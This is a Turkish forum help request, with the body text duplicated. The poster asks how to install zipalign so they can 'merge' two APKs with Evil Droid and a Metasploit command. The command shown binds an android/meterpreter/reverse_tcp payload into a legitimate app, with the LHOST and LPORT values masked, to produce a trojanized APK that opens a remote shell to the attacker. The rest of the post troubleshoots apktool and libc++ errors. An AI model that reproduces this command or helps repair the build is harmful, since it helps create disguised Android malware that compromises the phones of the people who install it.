mustafa.old
Hectopat
Merhaba konu başlığında da belirttiğim gibi zipalign paketini bir türlü yükleyemiyorum. Zipalign'i ne için kullanacığımdan kısaca bahsediyim. Konu daha anlaşılır olsun. Zipalign'i aslında iki apk dosyasını birleştirmek için kullamak istiyorum. Bunun için zipalign paketi gerekli. Evil Droid adlı bir uygulama var. Onun içinde zipalign paketini otomatik olarak kuruyor. Fakat "msfconsole -x apk.apk -p android/meterpreter/reverse_tcp LHOST=***** LPORT=**** R> new.apk" şeklinde terminalden apk birleştirme işlemi yaptığımda apktools hatası veriyor.
Hata resmi:
Resimde de gördüğünüz gibi. AptTool hatası alıyorum. Fakat AptTool'da hata olmadığını şu resimden gösterebilirim.
Fakat Terminale zipalign paketini çalıştırmak istediğimde şöyle bir hata alıyorum.
Zipalign'i çalıştırmak istediğim'de oluşan hata'daki paketi yüklemek istediğimde şöyle bir hata alıyorum. [apt-get install libc++]
Hatadaki Paketi de yüklemek istediğimde bu sefer başka hata alıyorum.
Yani Zipalign'de bir hata olduğu gayet açık. Zipalign'i belki baştan yüklesem sorun düzelir diye umuyorum. Başka forumlarda araştırma yaptığımda zipalignin dosyalarını lib64 klasörüne taşıyorlar. Bu Seferde ben zipalignin dosyalarının bulunduğu klasörün nerede olduğunu bilmiyorum. Anlayacağınız işin içinden çıkamaz hale gelmiş bulunmaktayım. Lütfen yardım edin....
Hata resmi:
Resimde de gördüğünüz gibi. AptTool hatası alıyorum. Fakat AptTool'da hata olmadığını şu resimden gösterebilirim.
Fakat Terminale zipalign paketini çalıştırmak istediğimde şöyle bir hata alıyorum.
Zipalign'i çalıştırmak istediğim'de oluşan hata'daki paketi yüklemek istediğimde şöyle bir hata alıyorum. [apt-get install libc++]
Hatadaki Paketi de yüklemek istediğimde bu sefer başka hata alıyorum.
Yani Zipalign'de bir hata olduğu gayet açık. Zipalign'i belki baştan yüklesem sorun düzelir diye umuyorum. Başka forumlarda araştırma yaptığımda zipalignin dosyalarını lib64 klasörüne taşıyorlar. Bu Seferde ben zipalignin dosyalarının bulunduğu klasörün nerede olduğunu bilmiyorum. Anlayacağınız işin içinden çıkamaz hale gelmiş bulunmaktayım. Lütfen yardım edin....
Son düzenleyen: Moderatör: